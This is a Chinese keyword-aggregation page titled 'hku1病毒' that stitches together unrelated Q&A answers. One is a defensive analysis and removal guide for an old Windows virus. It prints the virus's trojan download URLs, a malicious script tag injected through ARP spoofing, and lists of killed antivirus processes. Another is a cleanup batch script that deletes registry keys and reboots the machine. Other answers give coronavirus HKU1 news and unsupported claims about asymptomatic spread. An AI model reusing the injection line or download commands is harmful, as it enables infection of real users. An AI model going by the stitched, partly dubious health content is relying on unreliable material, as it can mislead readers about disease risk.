當前位置:首頁 » 股票資訊 » hku1病毒
擴展閱讀
南方量化成長股票型證券投資基金 2025-08-14 22:54:57
玉器在線鑒定 2025-08-14 22:42:57
神華股票最高價格 2025-08-14 22:41:53

hku1病毒

發布時間: 2021-10-08 07:48:49

A. 是不是最新的病毒只要搜索「殺毒,木馬,瑞星,江民……」等關鍵字IE就會自動關閉

最近發現很多人出現了打不開sha軟體 反病 毒工具 甚至帶有病 毒字樣的窗口 今天就接到了這樣的一個樣本 先前
這是一個可以說結合了幾乎所有病 毒的特徵的病毒 除了感染文件之外 可以說是比熊貓有過之而無不及!
病毒特徵:
1.破壞安全模式
2.結束常見殺毒軟體以及反病毒工具進程
3.監控窗口
4.關閉自動更新以及Windows安全中心
5.屏蔽顯示隱藏文件
6.下載木馬
7.IFEO映像劫持
8.GHOST文件引導破壞
9.各盤符均有引導啟動關聯文件,即便你重裝系統盤也照樣發作

分析報告
File: 1201AEC1.exe
Size: 36435 bytes
MD5:
SHA1:
CRC32: 27CA1195
加殼方式:UPX
病毒運行後
在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面釋放一個同樣由8個數字和字母組成的組合的文

件名的dll 和一個同名的dat 文件
我這里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll
這個隨機的數字應該與機器碼有關
該dll插入Explorer進程 Timplatform以及ctfmon進程

監視並關閉以下進程以及窗口
AntiVirus
TrojanFirewall
Kaspersky
JiangMin
KV200
kxp
Rising
RAV
RFW
KAV200
KAV6
McAfe
Network Associates
TrustPort
NortonSymantec
SYMANT~1
Norton SystemWorks
ESET
Grisoft
F-Pro
Alwil Software
ALWILS~1
F-Secure
ArcaBit
Softwin
ClamWin
DrWe
Fortineanda Software
Vba3
Trend Micro
QUICKH~1
TRENDM~1
Quick Heal
eSafewido
Prevx1
ers
avg
Ikarus
SophoSunbeltPC-cilli
ZoneAlar
Agnitum
WinAntiVirus
AhnLab
Normasurfsecret
Bullguard\Blac
360safe
SkyNet
Micropoint
Iparmor
ftc
mmjk2007
Antiy Labs
LinDirMicro Lab
Filseclab
ast
System Safety Monitor
ProcessGuard
FengYun
Lavasoft
NOD3
mmsk
The Cleaner
Defendio
kis6Beheadsreng
IceSword
HijackThis
killbox
procexp
Magicset
EQSysSecureProSecurity
Yahoo!
Google

P4P
Sogou PXP
ardsys
超級兔子木馬
KSysFiltsys
KSysCallsys
AVK
K7
Zondex
blcorp
Tiny Firewall Pro
Jetico
HAURI
CA
kmx
PCClear_Plus
Novatix
Ashampoo
WinPatrol
Spy Cleaner Gold
CounterSpy
EagleEyeOS
Webroot
BufferZ
avp
AgentSvr
CCenter
Rav
RavMonD
RavStub
RavTask
rfwcfg
rfwsrv
RsAgent
Rsaupd
runiep
SmartUp
FileDsty
RegClean
360tray
360Safe
360rpt
kabaload
safelive
Ras
KASMain
KASTask
KAV32
KAVDX
KAVStart
KISLnchr
KMailMon
KMFilter
KPFW32
KPFW32X
KPFWSvc
KWatch9x
KWatch
KWatchX
TrojanDetector
UpLive.EXE
KVSrvXP
KvDetect
KRegEx
kvol
kvolself
kvupload
kvwsc
UIHost
IceSword
iparmo
mmsk
adam
MagicSet
PFWLiveUpdate
SREng
WoptiClean
scan32
hcfg32
mcconsol
HijackThis
mmqczj
Trojanwall
FTCleanerShell
loaddll
rfwProxy
KsLoader
KvfwMcl
autoruns
AppSvc32
ccSvcHst
isPwdSvc
symlcsvcnod32kui
avgrssvc
RfwMain
KAVPFW
Iparmor
nod32krn
PFW
RavMon
KAVSetup
NAVSetup
SysSafe
QHSET
zxsweep.
AvMonitor
UmxCfg
UmxFwHlp
UmxPol
UmxAgent
UmxAttachment
KPFW32
KPFW32X
KvXP_1
KVMonXP_1
KvReport
KVScan
KVStub
KvXP
KVMonXP
KVCenter
TrojDie
avp.com.
krepair.COM
KaScrScn.SCR
Trojan
Virus
kaspersky
jiangmin
rising
ikaka
ba
kingsoft
360safe
木馬
木馬
病毒
sha
sha
查 毒
防 毒
反 病 毒
專殺
專殺
卡 巴 斯 基
江 民
瑞 星
卡卡社區
金 山 毒 霸
毒霸
金 山 社 區
3 6 0 安全
惡 意 軟 件
流 氓 軟 件
舉 報
報 警
殺 軟
殺 軟
防 駭

在C:\WINDOWS\Help\下面生成一個同樣由8個數字和字母組成的組合的文件名的chm文件
在C:\WINDOWS\下面生成一個同樣由8個數字和字母組成的組合的文件名的hlp文件
刪除C:\WINDOWS\system32\verclsid.exe
將其重命名為verclsid.exe.bak
釋放41115BDD.exe(隨機8位)和autorun.inf到除系統分區外的其他分區

注冊表相關操作
刪除
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
破壞安全模式

修改

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值

為0x00000000
HKU\S-1-5-21-1085031214-1078145449-839522115-500

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden為0x00000002
HKU\S-1-5-21-1085031214-1078145449-839522115-500

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden為0x00000001
屏蔽顯示隱藏文件

修改常見殺毒軟體服務的start鍵值為0x00000004
如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004

修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start
和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start鍵值為0x00000004
關閉自動更新

添加IFEO映像劫持項( 我的意見是用Autoruns刪除映像劫持)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe

被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那個dat文件

下載dl1.exe到臨時文件夾
首先下載http://google.xxxx38.org/update/down.txt看病毒是否需要更新

然後分別下載http://google.xxxx38.org/update/wow.exe
http://google.xxxx38.org/update/mh.exe
http://google.xxxx38.org/update/wm.exe
http://google.xxxx38.org/update/my.exe
http://google.xxxx38.org/update/wl.exe
http://google.xxxx38.org/update/zt.exe
http://google.xxxx38.org/update/jh.exe
http://google.xxxx38.org/update/tl.exe
http://google.xxxx38.org/update/1.exe
http://google.xxxx38.org/update/2.exe 到program files 文件夾 並把他們命名為ycnt1.exe~ycnt10.exe

具體每個文件的生成物就不一一列舉了
不過值得一提的是ycnt9.exe這個木馬
他生成C:\WINDOWS\system32\win1ogo.exe
並且該木馬試圖向區域網內所有用戶的80埠每隔5000ms進行arp欺騙
插入<script language=javascript src=http://google.171738.org/ad2.js></script>代碼
也就是區域網內所有用戶在打開網頁時都會被插入這段代碼

所有木馬文件植入完畢後 生成物如下
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
sreng日誌反映如下(在處理一些東西後掃描的這里提前列出)

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> []
<Kvsc><C:\WINDOWS\Kvsc3.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft

Shared\MSINFO\41115BDD.dll> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,> [N/A]
[PID: 1400][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-

2158)]
[C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]

解決辦法如下:

1.確定那個8位隨機數的dll的名稱
這里我們選用winrar確定那個dll的名稱
方法是:打開winrar.exe
工具 查看
在上面的地址欄中 進入c:\program files\common files\microsoft shared\msinfo目錄
我這台被感染的電腦的文件名為41115bdd.dll

2.使用強制刪除工具刪除那個dll文件
這里我們選用Xdelbox1.2這個軟體

XDelBox1.2(Dos級別滅殺工具):
1、dos級文件刪除方式,打造病毒清除新模式
2、無須進入安全模式,即可刪除所有病毒文件
3、支持一次重啟批量刪除多個文件
4、復制路徑的刪除添加方式更適用於網路求助(支持拖曳)
注意:刪除時復制所有要刪除文件的路徑,在待刪除文件列表裡點擊右鍵選擇從剪貼板導入。導入後在要刪除文件上點擊右鍵,選擇立刻重啟刪除,電腦會重啟進入DOS界面進行刪除操作,刪除完成後會自動重啟進入你安裝的操作系統。操作前注意保存電腦中正在打開的文檔。有關XDelBox的詳細說明請看xdelbox1.2目錄下help.chm

重起機器後
3.恢復被映像劫持的軟體
這里我們使用autoruns這個軟體 由於這個軟體也被映像劫持了 所以我們隨便把他改個名字
打開這個軟體後 找到Image hijack (映像劫持)
刪除除了Your Image File Name Here without a pathSymbolic Debugger for Windows 2000Microsoft Corporationc:\windows\system32\ntsd.exe
以外的所有項目

4.此時我們就可以打開sreng了 呵呵
打開sreng
系統修復 高級修復 點擊修復安全模式 在彈出的對話框中點擊是

5.恢復顯示隱藏文件

把下面的 代碼拷入記事本中然後另存為1.reg文件
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

雙擊1.reg把這個注冊表項導入

好了 此時病毒對於我們的所有限制已經解除了

6.清除其下載的木馬了
重起機器 進入安全模式
雙擊我的電腦,工具,文件夾選項,查看,單擊選取"顯示隱藏文件或文件夾"

清除"隱藏受保護的操作系統文件

用WINRAR打開 然後查看以下路徑,將發現的名字都刪(裡面是病毒下載下來的木馬)
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe
C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat(隨機8位數字字母組合)
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\WINDOWS\Help\41115BDD.chm(隨機8位數字字母組合)
C:\WINDOWS\system32\DirectX\DirectX.ini
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\41115BDD.hlp(隨機8位數字字母組合)
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
C:\Program files\ycnt1.exe~ycnt10.exe(如果有的話)

最後別忘了
7.還是用winrar 刪除各個分區下面的autorun.inf和 41115BDD.exe(隨機8位數字字母組合)
一定不要雙擊 最好的方法是用winrar看
8.裝殺毒軟體 保護好你的電腦
到此為止,病毒已經完全清除。。。

附帶本次所有軟體(連接絕不丟失):
xdelbox1.2
http://www.hltsoft.cn/download/soft/safetools1/xdelbox1.2.RAR

SREng
http://www.hltsoft.cn/download/soft/safetools1/SREng.rar

Autoruns
http://www.hltsoft.cn/download/soft/safetools1/Autoruns861-YYZ.rar

轉貼請註明(風月閣) 來自:http://kairizero.blog.sohu.com/

B. 查出病毒文件如下,請問這些都是純病毒么,要怎麼處理刪除會不會影響系統正常運行

卡巴斯基6.0 官方下載地址:
http://www.kaspersky.com.cn/KL-Downloads/KL-Proct6.0.htm

這是國際上最好用的殺毒軟體,建議先重裝或恢復系統後進行殺毒,否則這些病毒容易使你電腦過慢,導致殺毒過程很漫長~

C. 冠狀病毒和SARS有怎樣的關系

新冠狀病毒不是非典,但是症狀類似。中國疾控中心指出,雖然此次新型冠狀病毒不是SARS,但冠狀病毒可引起一系列症狀。目前的兩例實驗室確診病例均表現為嚴重呼吸道感染症狀,嚴重程度類似SARS(非典)。

中國疾控中心指出,SARS也是由一種冠狀病毒引起,此次病毒非SARS,但冠狀病毒可引起一系列症狀,既可導致症狀輕微的普通感冒,也可能引起嚴重的呼吸系統疾病。目前的兩例確診病例均表現為嚴重呼吸道感染症狀,嚴重程度類似SARS(非典)。

新冠狀病毒的人際傳播能力跟SARS有相應的地方,就是平均一個病人能夠傳染2到3個人,這是它的傳播能力。另外還有一個重要指標是這個病的倍增時間相對來說比SARS要短,SARS是9天左右的時間會倍增。

新型冠狀病毒大概6、7天的時間病例就會翻倍。它的一個衡量指標傳代間隔,新型冠狀病毒相對比較短,所以使得病例增長速度也相對比較快。

(3)hku1病毒擴展閱讀:

這一病毒和引起非典的冠狀病毒不同,並不能和SARS劃等號。目前在英國確診的患者病情很重,很多方面比較類似於SARS。就我們判斷,疾病的嚴重程度、傳播方式很相近,比較類似,不能說完全等同,主要是它的結構是不是完全一樣,傳播類型是不是完全一樣。

D. 浙江舟山口岸首次檢出人類冠狀病毒HKU1是怎麼回事

據報道,浙江舟山出入境檢驗檢疫局表示,近日該局在對一艘馬爾他籍油輪進行疫情排查時,在一名喬治亞籍船員呼吸道樣本中檢出了人類冠狀病毒HKU1,這是浙江口岸首次檢出該類型冠狀病毒。

目前,經過治療,該船員身體狀況已經明顯好轉。

專家表示人類冠狀病毒HKU1主要引起細支氣管炎或肺炎,在人群中的感染率約為0.3%~4.4%之間。對於嬰幼兒、老年人和免疫力低下的人群,其能引起更為嚴重的呼吸道疾病。

E. 新冠無症狀感染者同樣具有傳染性,他的傳染性有多強

無症狀的感染者的傳染性是比較弱的,他們自身抵抗力比較強,某些患者身上存在這個病毒的抗體。相比於確診病例的患者傳染性要弱很多。

目前這個病毒已經接近快尾聲了,但是大家依然不能放鬆,還是要時刻保持警惕,以防自己身邊存在那些無症狀感染者,隨時帶好口罩,勤洗手。

F. 病毒阿!病毒~ 誰知道這些病毒文件是什麼

找到路徑將其刪除,但HKU\S-1-5-21-1390067357-1580436667-682003330-1003\Software\GameSpy多數為注冊表項被感染了。

G. 很奇怪的病毒

把我下面的代碼復制下來,另存為.bat為後綴的文件,也就是批處理文件啦,然後雙擊運行就可以了.如果不行的話,請在我的網路空間里留言.另外請在殺毒重啟時把U盤那些移動存儲設備拔掉.

@echo off
title 憶林子
color 0a
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
echo.
echo 該病毒資料
echo.
echo 該病毒建立的包括的源文件如下:
echo.
echo 病毒文件全路徑 大小(位元組)
echo c:\WINDOWS\system32\54D427F8.EXE(這個數字是病毒隨機生成的) 20,284
echo c:\WINDOWS\system32\A0A29414.DLL(這個數字是病毒隨機生成的) 13,812
echo 其它所有分區:\autorun.inf 78
echo 其它所有分區:\auto.exe 20,284 20,284
echo.
echo 其中autorun.inf文件里的內容
echo.
echo [AutoRun]
echo open=auto.exe
echo shellexecute=auto.exe
echo shell\Auto\command=auto.exe
echo.
echo 注意:因為該病毒與系統進程綁定在一起,所以在殺毒時你的計算機將會被強制重啟
echo 重啟之後,請再運行一次本程序,該病毒方可清除完畢。
echo 請把該程序放在桌面上執行,並且在重啟之後馬上再次運行該程序。
echo.
echo ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
echo.
set /p tmp=以上是該病毒的信息,如果要清除該病毒,請回車鍵開始殺毒...

if not exist c:\tmp1.憶林子 (
reg query HKLM\SYSTEM\CurrentControlSet\Services\CF9EDF4C /v ImagePath >>c:\tmp1.憶林子
)
if not exist c:\tmp2.憶林子 (
reg query HKLM\SYSTEM\CurrentControlSet\Services\CF9EDF4C /v Description >>c:\tmp2.憶林子
)
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v isFirstRun>>tmp.憶林子
for /f "tokens=1,2,3 skip=4 delims= " %%j in ('more tmp.憶林子') do set isFirstRun=%%l
if exist tmp.憶林子 del tmp.憶林子 /q
if /i "%isFirstRun%"=="1" goto :secondStep
net stop cf9edf4c>nul
for /L %%c in (1,1,10) do (
sc delete cf9edf4c>nul
)
rem 刪除由病毒新建的項
reg delete "HKCU\SYSTEM" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT" /v ReportBootOk /f
reg delete "HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_CF9EDF4C" /f
reg delete "HKLM\SYSTEM\ControlSet001\Services\CF9EDF4C" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CF9EDF4C" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\CF9EDF4C" /f
reg delete "HKU\.DEFAULT\SYSTEM" /f
reg delete "HKU\S-1-5-18\SYSTEM" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v isFirstRun /d 1 /f
shutdown -r -t 0
exit

:secondStep
for /f "tokens=1,2,3 skip=1 delims= " %%j in ('more c:\tmp1.憶林子') do set test=%%l
set fileName1=%test:~-12%
echo %fileName1%

for /f "tokens=1,2,3 skip=1 delims= " %%j in ('more c:\tmp2.憶林子') do set fileName2=%%l.dll
echo %fileName2%

for %%d in (%fileName1%,%fileName2%) do (
taskkill /im %%d /f>nul
taskkill /fi "moles eq %%d" /f>nul
)
if exist c:\temp1.憶林子 del c:\temp1.憶林子 /q
if exist c:\temp2.憶林子 del c:\temp2.憶林子 /q
for %%d in (%fileName1%,%fileName2%) do (
if exist "%systemroot%\system32\%%d" (
attrib -s -h -r "%systemroot%\system32\%%d"
del "%systemroot%\system32\%%d" /q
)
)
del c:\WINDOWS\Prefetch\*.* /q
rd "%userprofile%\Local Settings\temp" /s /q
rem 添加病毒刪除的項
echo Windows Registry Editor Version 5.00>>tmp.憶林子.reg
echo.>>tmp.憶林子.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ERSvc]>>tmp.憶林子.reg
echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>tmp.憶林子.reg
